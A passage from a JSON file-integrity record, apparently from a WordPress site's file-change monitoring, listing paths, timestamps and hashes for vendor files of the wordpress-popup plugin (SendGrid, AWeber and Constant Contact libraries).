\\/sendgrid-php\\/vendor\\/composer\\/autoload_classmap.php\":{\"d\":1534138296,\"h\":\"8645d3a4e3ad87e7cf4d88a46717aab4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/vendor\\/composer\\/autoload_real.php\":{\"d\":1534138296,\"h\":\"f8c559bdd15be501659533e99a22ec59\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/vendor\\/composer\\/ClassLoader.php\":{\"d\":1534138296,\"h\":\"7bcd58ef2df6fe97165bea70fe9c7712\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/vendor\\/composer\\/autoload_files.php\":{\"d\":1534138296,\"h\":\"87d57761026f4aa1f421ad0df02b5627\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/vendor\\/composer\\/autoload_psr4.php\":{\"d\":1534138296,\"h\":\"29f1e269bc42e15b7b637fe9dd12bc17\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/vendor\\/composer\\/autoload_namespaces.php\":{\"d\":1534138296,\"h\":\"35e12c7d76c4a81633bcf547c0e229a9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/vendor\\/composer\\/LICENSE\":{\"d\":1534138296,\"h\":\"955d5fe58c231244f6b49000f383b5e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/vendor\\/autoload.php\":{\"d\":1534138296,\"h\":\"a01c6e368544e1d692d6d68cf10b834d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/lib\\/helpers\\/stats\\/Stats.php\":{\"d\":1534138296,\"h\":\"ae6ce4434c5a87815fba52a7d079f1f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/lib\\/helpers\\/mail\\/README.md\":{\"d\":1534138296,\"h\":\"e8bfc2fea717b6689f1eeba8206d50c8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/lib\\/helpers\\/mail\\/Mail.php\":{\"d\":1534138296,\"h\":\"cd30f0195681f461028b28f40b337226\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/lib\\/helpers\\/contacts\\/README.md\":{\"d\":1534138296,\"h\":\"cf322e56dcd7c991ae326c77a6b91c22\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/lib\\/helpers\\/contacts\\/Recipients.php\":{\"d\":1534138296,\"h\":\"1b032716c9f687f594d611c7e64dd15f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/lib\\/loader.php\":{\"d\":1534138296,\"h\":\"87a580065f52f6a28fad17fe80f7bad5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/lib\\/SendGrid.php\":{\"d\":1534138296,\"h\":\"75296d4b18b2fab35de6b6701ce17900\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/broadcasts\\/1337.json\":{\"d\":1534138295,\"h\":\"1181d7d88649144dd0adc5e2eba24ea2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/custom_fields\\/1.json\":{\"d\":1534138295,\"h\":\"a153444dcc5bea6c7779ce6e8ee80a8d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/custom_fields\\/303449.json\":{\"d\":1534138295,\"h\":\"d6f11bb141084a9dfce5c3cc91b33a85\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/custom_fields\\/2.json\":{\"d\":1534138295,\"h\":\"f820e8c8b0935cea4669b30e6adc7bd8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/subscribers\\/find_tsl.json\":{\"d\":1534138295,\"h\":\"b026324c6904b2a9cb4b88d6d61c81d1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/subscribers\\/find.json\":{\"d\":1534138295,\"h\":\"b8177f4d2717921004ad425c2cb4bf1e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/subscribers\\/1.json\":{\"d\":1534138295,\"h\":\"cfd1200e993a4f7f2239b529e5b76bb0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/subscribers\\/activity.json\":{\"d\":1534138295,\"h\":\"cfbffa51e9a62aee5d80c80699c9d355\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/subscribers\\/activity_ts.json\":{\"d\":1534138295,\"h\":\"b026324c6904b2a9cb4b88d6d61c81d1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/subscribers\\/nonexist.json\":{\"d\":1534138295,\"h\":\"c30a37667e34811e8286086329592f90\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/subscribers\\/page1.json\":{\"d\":1534138295,\"h\":\"ae7c11f79813d54b0de997eb07495283\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/subscribers\\/3.json\":{\"d\":1534138295,\"h\":\"2f979f39b7265017e43da1f361a65c10\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/subscribers\\/nonexist_tsl.json\":{\"d\":1534138295,\"h\":\"897316929176464ebc9ad085f31e7284\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/subscribers\\/2.json\":{\"d\":1534138295,\"h\":\"9b5c6cc65d67de95c6e603b17df9fa87\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/subscribers\\/find_1of2.json\":{\"d\":1534138295,\"h\":\"8b5963e2ab7a628ecb47a302dd3e91b1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/subscribers\\/find_2of2.json\":{\"d\":1534138295,\"h\":\"f7930421433e460ce8682d3cf232b368\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/subscribers\\/find_1of2_tsl.json\":{\"d\":1534138295,\"h\":\"26ab0db90d72e28ad0ba1e22ee510510\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/campaigns\\/303449.json\":{\"d\":1534138295,\"h\":\"b34dc35320eebbb4a33fa4c385e1f60c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/accounts\\/1.json\":{\"d\":1534138295,\"h\":\"784b26e45887294b31aa2b28afe890c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/accounts\\/webForms.json\":{\"d\":1534138295,\"h\":\"769e86794adcefbe8da250ed0a4441b1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/accounts\\/findSubscribers_ts.json\":{\"d\":1534138295,\"h\":\"b026324c6904b2a9cb4b88d6d61c81d1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/accounts\\/findSubscribers.json\":{\"d\":1534138295,\"h\":\"468a3d067246f9f8cf062f54517e0a52\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/accounts\\/page1.json\":{\"d\":1534138295,\"h\":\"a45d4f5402c63cfcd1bbc9b35bc2b360\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/accounts\\/webFormSplitTests.json\":{\"d\":1534138295,\"h\":\"4ae1824b5b8cce1c6b9df0bd959d3ca6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/lists\\/page1.json\":{\"d\":1534138295,\"h\":\"d8117dd10b4b639a7c4c4f07af89ed3c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/lists\\/page2.json\":{\"d\":1534138295,\"h\":\"fa86ebb389a346d7ab38c24e81e0cbad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/lists\\/303449.json\":{\"d\":1534138295,\"h\":\"061d904d0e92e7d334789a8f42bb56bc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/lists\\/505454.json\":{\"d\":1534138295,\"h\":\"9fd09dd95338a041daf0764d2f33892a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/error.json\":{\"d\":1534138295,\"h\":\"05ca1ba1f846e0cf4a33356e3c92fb61\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/data\\/empty.json\":{\"d\":1534138295,\"h\":\"cfcd208495d565ef66e7dff9f98764da\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/AWeberCreateEntryTest.php\":{\"d\":1534138295,\"h\":\"fcec10a6430a45d3c81b16587f3cf9a6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/AWeberCollectionFindTest.php\":{\"d\":1534138295,\"h\":\"fe3be2dd8ea1192707e564004aa47aa0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/OAuthApplicationTest.php\":{\"d\":1534138295,\"h\":\"63e1017f067b54235dd68cee2a4a3649\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/AWeberCollectionTest.php\":{\"d\":1534138295,\"h\":\"e622aded710c65fa353011617425b91b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/mock_data.php\":{\"d\":1534138295,\"h\":\"9066be37aecffe0a54ac3ae92c653618\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/mock_adapter.php\":{\"d\":1534138295,\"h\":\"4bce431c26b7e6da1bcb0120f3350f8b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/MultiVersionTest.php\":{\"d\":1534138295,\"h\":\"642ffed4ee698971ab377e2ed1532e85\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/AWeberEntryTest.php\":{\"d\":1534138295,\"h\":\"4e8f5d59bbf3590b01aeda9eed0f7e49\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/AWeberAPITest.php\":{\"d\":1534138295,\"h\":\"0307ea0f96b71ed5e86a7783ddfc9149\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/tests\\/AWeberCollectionParentEntryTest.php\":{\"d\":1534138295,\"h\":\"28e2b5d9c324106cd9c53cc6bdd2216d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/aweber_api\\/aweber_api.php\":{\"d\":1534138295,\"h\":\"2e5ab60dcd5297604b9cb3b5efbc17d1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/aweber_api\\/exceptions.php\":{\"d\":1534138295,\"h\":\"f17014f1252de152c9d1fdbda2ca004b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/aweber_api\\/aweber_response.php\":{\"d\":1534138295,\"h\":\"03dcc234ef969cb9ba10468760250c71\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/aweber_api\\/oauth_adapter.php\":{\"d\":1534138295,\"h\":\"3639fe59c1cd5cfaa7dbd55a1867afbf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/aweber_api\\/oauth_application.php\":{\"d\":1534138295,\"h\":\"29acfa625615d359a0a29375dfc06032\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/aweber_api\\/aweber.php\":{\"d\":1534138295,\"h\":\"2979bfd49feada31b05ae51dfa625b86\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/aweber_api\\/aweber_collection.php\":{\"d\":1534138295,\"h\":\"34ccca7b8df2830776d54f06db20f3d6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/aweber_api\\/aweber_entry_data_array.php\":{\"d\":1534138295,\"h\":\"e765481d9445f09c25a27171202df22d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/aweber_api\\/curl_object.php\":{\"d\":1534138295,\"h\":\"65afd97003598b1f9141e5f61f24c972\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/aweber_api\\/aweber_entry.php\":{\"d\":1534138295,\"h\":\"64ee58421217146d3ce69b39322d645f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/aweber_api\\/curl_response.php\":{\"d\":1534138295,\"h\":\"4390164d6d970103513374490c55be0c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/build\\/phpunit.xml\":{\"d\":1534138295,\"h\":\"88c8d01bb6f30331282b0e44d1e0a372\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/build\\/phpcs.xml\":{\"d\":1534138295,\"h\":\"fbc6a5a2a9836cc9f9ee7bf83ba8cd72\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/build\\/phpmd.xml\":{\"d\":1534138295,\"h\":\"f460b19cb91ad7f426f84e4ece60688c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/composer.json\":{\"d\":1534138295,\"h\":\"5075e55199230fb9fe6e9e7c87797a27\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/demo.php\":{\"d\":1534138295,\"h\":\"14ed38afb85d3a81471c754aaffc0d09\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/README.md\":{\"d\":1534138295,\"h\":\"6df961cf307bce24499693fbf9c8c90c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/LICENSE\":{\"d\":1534138295,\"h\":\"b05d6bed30998b57d99e86a024884388\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/aweber\\/aweber\\/build.xml\":{\"d\":1534138295,\"h\":\"8621fc15bacfe1456f1c64818ed9bf4e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/WebHooks\\/CTCTWebhookUtil.php\":{\"d\":1534138296,\"h\":\"26e5577ae1088e8861b207b5114b55c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Exceptions\\/OAuth2Exception.php\":{\"d\":1534138296,\"h\":\"0dde5fe9d162e53fe46019d6885e6dff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Exceptions\\/CtctException.php\":{\"d\":1534138296,\"h\":\"db0af2fe9e2f2ff32a815e953c9b963b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Exceptions\\/IllegalArgumentException.php\":{\"d\":1534138296,\"h\":\"6c1f1cc5867be6edda6d3c419f90aa05\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Auth\\/CtctDataStore.php\":{\"d\":1534138296,\"h\":\"0280b3a70835e47a4980928e40239a0d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Auth\\/SessionDataStore.php\":{\"d\":1534138296,\"h\":\"f324005db5879824ec3e803c6b4b0168\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Auth\\/CtctOAuth2.php\":{\"d\":1534138296,\"h\":\"8a82218c5e23497021de6cbc81aece6f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Util\\/CurlResponse.php\":{\"d\":1534138296,\"h\":\"7fb84400dc5ed5d6dd9078cd58e98d67\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Util\\/RestClient.php\":{\"d\":1534138296,\"h\":\"27c66d08bc5bab4dc563ab907564e40c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Util\\/Config.php\":{\"d\":1534138296,\"h\":\"e6cc69690f51ccd542c5fff44f516218\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Util\\/RestClientInterface.php\":{\"d\":1534138296,\"h\":\"5c10fd2fac401b7c2ed22c6be666c637\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Services\\/EmailMarketingService.php\":{\"d\":1534138296,\"h\":\"18e02e8fd5ee0d37825e6581245c2366\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Services\\/CampaignTrackingService.php\":{\"d\":1534138296,\"h\":\"2c474eaab3041ee872dc6003888d4ee1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Services\\/BaseService.php\":{\"d\":1534138296,\"h\":\"7aff3f76019a5d89426e8ce68da97370\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Services\\/CampaignScheduleService.php\":{\"d\":1534138296,\"h\":\"8ce1ff8b9be4ea7c17bc7036d44aedd3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Services\\/ListService.php\":{\"d\":1534138296,\"h\":\"93e4f3f471ab0e04c631aad19084326c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Services\\/LibraryService.php\":{\"d\":1534138296,\"h\":\"75d5912b0672a8adf2ed01854b6bac24\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Services\\/AccountService.php\":{\"d\":1534138296,\"h\":\"87ac830489457e8104bc93bdb9bd39ad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Services\\/ContactService.php\":{\"d\":1534138296,\"h\":\"53fab91cee49c6fe8c9b404b3490ddcc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Services\\/ContactTrackingService.php\":{\"d\":1534138296,\"h\":\"a1fc6f7d85666c09e0900b79aa081070\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Services\\/ActivityService.php\":{\"d\":1534138296,\"h\":\"960079ff4d5aef8e75e8768e548c11d2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Account\\/VerifiedEmailAddress.php\":{\"d\":1534138296,\"h\":\"fea9c2c94df816f2e01425d0efb8b82b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Account\\/AccountInfo.php\":{\"d\":1534138296,\"h\":\"498a6dd8e8ff4a09136aa1a0226b4140\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Library\\/Thumbnail.php\":{\"d\":1534138296,\"h\":\"a1c6e5a9521209ed8e187c2278ce28cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Library\\/File.php\":{\"d\":1534138296,\"h\":\"df6c2f13442e07400d6e89b262a3b822\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Library\\/Folder.php\":{\"d\":1534138296,\"h\":\"091f8a611cf2b18ef8a2f5e686e85fae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Contacts\\/EmailAddress.php\":{\"d\":1534138296,\"h\":\"432e6b5d6e3f3578afdce6dda21aad97\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Contacts\\/Address.php\":{\"d\":1534138296,\"h\":\"f9e4538b67f9b0373fa01a13fa9a56f0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Contacts\\/CustomField.php\":{\"d\":1534138296,\"h\":\"40b088bbf9cb2be3b267b12fb279e0a2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Contacts\\/Contact.php\":{\"d\":1534138296,\"h\":\"e0c7b57e35a6673ad09a96338c2c2616\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Contacts\\/ContactList.php\":{\"d\":1534138296,\"h\":\"3cfd6a0dc49257a45d2228d862af0d48\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Contacts\\/Note.php\":{\"d\":1534138296,\"h\":\"cb935404ae73fcfb2a281d03d580b4bc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/EmailMarketing\\/ClickThroughDetails.php\":{\"d\":1534138296,\"h\":\"91bc3ee2b7b6aab630ed928572b9732e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/EmailMarketing\\/Schedule.php\":{\"d\":1534138296,\"h\":\"afd3c86f0746aae3c7ecced448f61869\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/EmailMarketing\\/MessageFooter.php\":{\"d\":1534138296,\"h\":\"bb77a4df314cd653e8491eccabbe9319\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/EmailMarketing\\/TestSend.php\":{\"d\":1534138296,\"h\":\"8f6ae573816bc13b38a460787e10da4c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/EmailMarketing\\/Campaign.php\":{\"d\":1534138296,\"h\":\"a1e1ddcd6dfa91e3d81b5852dc8896ef\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Tracking\\/TrackingSummary.php\":{\"d\":1534138296,\"h\":\"b65a627101c0df47afeb99f36c21a7db\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Tracking\\/SendActivity.php\":{\"d\":1534138296,\"h\":\"2e506719a0dd5a1a466a6f6a10976e3d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Tracking\\/OpenActivity.php\":{\"d\":1534138296,\"h\":\"0d5d7dfe7e33bcb5a4d577a76f8550ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Tracking\\/TrackingActivity.php\":{\"d\":1534138296,\"h\":\"dcada142a8c9e1d384d44d0d4c932878\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Tracking\\/UnsubscribeActivity.php\":{\"d\":1534138296,\"h\":\"f276f543eee27a06e81f3efcda29f7d9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Tracking\\/ClickActivity.php\":{\"d\":1534138296,\"h\":\"fa58f51aad43aefa99532c3f780e3a2c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Tracking\\/BounceActivity.php\":{\"d\":1534138296,\"h\":\"b3f5da638f0c63ecc8e12b8008a0d4be\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Tracking\\/ForwardActivity.php\":{\"d\":1534138296,\"h\":\"b6368aacbf024abb83c8744ed1de6c43\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/Ctct\\/Components\\/Activities\\/AddContacts.php\":{\"d\":1534138296,\"h\":\"df744da0047aa984f98bb9e93e5829d4\"},\"\\